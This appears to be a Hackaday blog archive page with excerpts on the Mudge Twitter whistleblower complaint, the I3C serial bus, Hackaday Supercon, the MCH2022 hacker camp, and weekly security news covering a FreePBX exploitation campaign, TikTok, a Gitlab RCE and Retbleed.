This Week In Security: In Mudge We Trust, Don’t Trust That App Browser, And Firefox At Pwn2Own

August 26, 2022 by 19 Comments

There’s yet another brouhaha forming over Twitter, but this time around it’s a security researcher making noise instead of an eccentric billionaire. [Peiter Zatko] worked as Twitter’s security chief for just over a year, from November 2020 through January 2022. You may know Zatko better as [Mudge], a renowned security researcher, who literally wrote the book on buffer overflows. He was a member at L0pht Heavy Industries, worked at DARPA and Google, and was brought on at Twitter in response to the July 2020 hack that saw many brand accounts running Bitcoin scans.

Mudge was terminated at Twitter January 2022, and it seems he immediately started putting together a whistleblower complaint. You can access his complaint packet on archive.org, with whistleblower_disclosure.pdf (PDF, and mirror) being the primary document. There are some interesting tidbits in here, like the real answer to how many spam bots are on Twitter: “We don’t really know.” The very public claim that “…<5% of reported mDAU for the quarter are spam accounts” is a bit of a handwave, as the monetizable Daily Active Users count is essentially defined as active accounts that are not bots. Perhaps Mr. Musk has a more legitimate complaint than was previously thought.
Continue reading “This Week In Security: In Mudge We Trust, Don’t Trust That App Browser, And Firefox At Pwn2Own”

I3C — No Typo — Wants To Be Your Serial Bus

August 25, 2022 by 67 Comments

Remember old hard drives with their giant ribbon cables? They went serial and now the power cables are way thicker than the data cables. We’ve seen the same thing in embedded devices. Talking between chips these days tends to use I2C or SPI or some variation of these to send and receive data over a handful of pins. But now there is I3C, a relatively new industry standard that is getting a bit of traction.

I2C and SPI are mature but they do have problems. I2C can be relatively slow and SPI usually requires extra pins for each device. Besides that, there is poor support for adding and removing devices dynamically or discovering devices automatically.

I3C, created by the MIPI Alliance, aims to fix these problems. It does use the usual two wires, SCL for the clock and SDA for data.  One device acts as a controller. Other devices can be targets or secondary controllers. It is also backward compatible with I2C target devices. Depending on how you implement it, speeds can be quite fast with a raw speed of 12.5 Mbps and using line coding techniques can go to around 33 Mbps.

Continue reading “I3C — No Typo — Wants To Be Your Serial Bus”

2022 Hackaday Supercon Tickets On Sale Now

August 15, 2022 by 15 Comments

Did I tell you about the time that [Spetku] turned the schwag bottle into a Jacob’s Ladder?
Supercon Tickets go on sale right now! And the true-believer tickets usually sell out fast, so if you’re as excited about the thought of a real-life Supercon as we are, get yours now for a healthy discount.

We might be biased, but Supercon is our favorite conference of the year. Smaller than most and hardware-focused, you really can’t beat the signal/noise ratio of the crowd in attendance and the talks on the stage. People bring their projects, their great ideas, and their big dreams with them. And we have a cool badge to boot. It’s Hackaday, but in real life. And you should join us!

The conference starts on Friday Nov. 4th with registration, a mellow afternoon of badge-hacking, and a party to kick things off right. Saturday and Sunday are the main show, with a hacker village in the alley, workshops aplenty, and of course all of the talks. It’s only a weekend, but it’s one you’ll keep going back to in your mind for the whole year.

The Nitty Gritty Details

One hundred (100) True-believer Tickets are on sale now for $128 apiece, or until Aug. 29th. We call them True-believer Tickets because we haven’t even finished the call for proposals yet, much less selected the talks, but trust us, it’s going to be a good slate. (In past years, the True-believer tickets have sold out in as little as a day, so don’t sleep on this!) After that, regular admission is $256.

Of course, there’s always a back door if you want to sneak in for free. In our opinion, the coolest way to attend a conference is to give a talk, and you’ll get a complimentary ticket to boot! And even if you don’t get selected, we’ll give everyone who submits a serious talk proposal a ticket at the discounted price, so don’t hesitate. Volunteers also get in free, and we’ll be putting out the call on Aug 29th.

No matter how you get yourself a ticket, get one, and get to Supercon. We’re excited to see you in person again!

An illuminated MCH2022 sign composed of large LED letters

Mutually Crafted Happiness: How MCH2022 Happened

August 2, 2022 by 16 Comments

Just a few days ago, MCH2022, a six day long hacker camp in Netherlands, has concluded – bringing about three thousand hackers together to hang out. It was my first trip to a large hacker camp like this, as I’ve only been to smaller ones, and this story is coming from someone who’s only now encountering the complexity and intricacy of one. This is the story of how it’s run on the inside.

MCH2022 is the successor of a hacker camp series in the Netherlands – you might’ve heard of the the previous one, SHA, organized in 2017. The “MCH” part officially stands for May Contain Hackers – and those, it absolutely did contain. An event for hackers of all kinds to rest, meet each other, and hang out – long overdue, and in fact, delayed for a year due to the everpresent pandemic. This wasn’t a conference-like event where you’d expect a schedule, catering and entertainment – a lot of what made MCH cool was each hacker’s unique input.

Just like many other camps similar to this, it was a volunteer-organized event – there’s no company standing behind it, save for a few sponsors with no influence on decisionmaking; it’s an event by hackers, for hackers. The Netherlands has a healthy culture of hackerspaces, with plenty of cooperation between them, and forming a self-organized network of volunteers, that cooperation works magic. Continue reading “Mutually Crafted Happiness: How MCH2022 Happened”

This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

July 22, 2022 by 14 Comments

There’s an ongoing campaign that’s compromising FreePBX systems around the world. It seems to be aimed specifically at Elastix systems, using CVE-2021-45461, a really nasty Remote Code Execution (RCE) from December of last year. This flaw was a 0-day, as it was discovered by analyzing a compromised FreePBX system. It’s unclear if the campaign described in last week’s report was using the 0-day back in December, or if it was launched as a result of the public disclosure of the bug.

Regardless, the CVE is a URL parameter sent to the Rest Phone Apps service. This module is intended to run right on the screen of VoIP phones, and allow end users to set features like Do Not Disturb without having to punch in star codes, or visit a web page. Because of the use case, any FreePBX deployment that supports VoIP phones connecting from outside the network, that use this feature, would need these ports open. The best way to secure that would be to enforce connections over a VPN, which only some phones natively support.

Upon finding a vulnerable endpoint, the campaign starts by dropping a webshell in several locations, all obfuscated slightly differently. It then creates multiple root-level user accounts, and adds a Cron job to maintain access. There is a surprising amount of obfuscation and stealth features in this family of malware, making it difficult to point to a single Indicator Of Compromise. If you run a FreePBX system that may have the Phone Apps module running, it’s time to go through it with a fine-toothed comb.

What’s The Deal with TikTok?

The FCC has once again called for TikTok to be de-listed from the Google Play Store and the Apple App store. What is going on with TikTok? It’s just an app for filming and sharing silly videos, right? There are essentially two potential problems with TikTok, and both of them trace back to the app’s parent company residing in China.

Here in the US we have National Security Letters, and China seems to have a more straightforward system, where “everything is seen in China,” as said by a member of TikTok’s Trust and Safety Department. TikTok uses quite a few permissions, some of which seem a bit overzealous. If you’re a person of interest to the Chinese government, could those permissions be used to surveil you? Absolutely. Just like a US based app could, as a result of a National Security Letter.

The second problem is a bit more subtle, and may stray towards a conspiracy theory, but is worth considering. TikTok has videos about every subject imaginable, from every possible viewpoint. What if the Chinese Communist Party (CCP) wanted a specific rumor to gain traction in the US? Just a little pressure on the video recommendation algorithm would make videos about that topic trend. Instant public opinion lever.

There’s likely a missing piece of the story here, in the form of some classified intel. Until enough time goes by that a Freedom of Information Act request can unlock the rest of the story, it’s going to be unclear how much of the TikTok threat is legitimate, and how much is geo-political wrangling.

Oh, and if you thought you could just go open up the Google Play Store and see the exact permissions the TikTok app uses, Google has made the unfortunate decision to hide permissions until you actually do the install. That sounds like a terrible decision and, after a brief outcry, it seems like Google agrees. Just before this article went to the presses, Google announced that they were walking back this decision.

Gitlab RCE

Gitlab fixed a very serious problem in its 4th of July round of minor version releases, and [Nguyễn Tiến Giang (Jang)] really wanted to understand what was going on with this one. So much so, that he set up a debuggable install of Gitlab and recreated the issue, bringing us along for the ride. The flaw is in importing an existing Gitlab project, where the archive name is appended directly to a command string. If you can manipulate the value given for the archive name, and avoid tripping on any of the checks intended to prevent it, you can trivially insert shell code that will be run on the underlying server. Avoiding the traps is a big part of the work to actually make this into an real PoC. Read the post for full details on the debugging journey.

Calendar Spam Finally Fixed

Consider yourself lucky if you’ve missed out on the scourge that is Calendar spam. Google Calendar is great, because anyone can send you an email with an invite, and the event automatically shows up on your calendar. In retrospect, it seems obvious that this would be used for spam. Regardless, after multiple years of the spam problem, Google is finally rolling out a feature, to only add invitations to your calendar from known senders. Now if you get asked, or suffer from spam yourself, you know to look under event settings, and make the setting change. Finally!

The 2022 Hackaday Supercon Is On! And The Call For Proposals Is Open

July 18, 2022 by 42 Comments

After two years in remote mode, we’re very excited to announce that this year’s Hackaday Supercon will be coming back, live! Join us Nov. 4th, 5th, and 6th in sunny Pasadena, CA for three days of hacks, talks, and socializing with the Hackaday community. And we’d love to see and hear in person what you’ve been up to for the last two years – so start brainstorming what you’re going to talk about now and fill out the call for proposals.

Supercon is On!

We’ll be starting off on Friday Nov. 4th with early-bird registration, a mellow afternoon of badge-hacking and workshops, and a party to kick off the con. Saturday and Sunday will be the full enchilada: two tracks of talks, hacking stations and food set up in the alley, and workshops aplenty. (Just thinking about hacking in the alley and sharing tacos afterward again brings a tear of joy to my eye.) We’ll close up Sunday night with the 2022 Hackaday Prize Awards and a chance to demo the weekend’s badge hacking on stage.

If you haven’t ever been to a Supercon before, it’s Hackaday in real life. People bring hacks to show and share, projects to work on, and their ideas that are too big to fit in the overhead compartment anyway. The crowd is awesome. There are seasoned pros, famous YouTubers, and brand-new hackers to boot. But yet it’s not overwhelming – Supercon is too big to fit in your living room, but it’s nonetheless cozy. The folks in attendance are all fantastic and you’ll stumble into the most awesome conversations.

It’s a weekend you don’t want to miss, so start figuring out how you’re going to get to Pasadena now.

We’ll be putting tickets on sale soon, and while we can’t see into the future, they have sold out every year, so keep your eyes on Hackaday to get yours. And of course, speakers don’t need no stinking tickets. Continue reading “The 2022 Hackaday Supercon Is On! And The Call For Proposals Is Open”

This Week In Security: Retbleed, Post-Quantum, Python-atomicwrites, And The Mysterious Cuteboi

July 15, 2022 by 11 Comments

Yet another entry in the “why we can’t have nice things” category, Retbleed was announced this week, as yet another speculative execution vulnerability. This one is mitigated in hardware for AMD’s Zen 3 and Intel Generation 9 and later. For earlier devices the performance hit in mitigation is quite painful. What exactly makes this different from previous weaknesses, and why didn’t the previous mitigations cover this problem?
Continue reading “This Week In Security: Retbleed, Post-Quantum, Python-atomicwrites, And The Mysterious Cuteboi”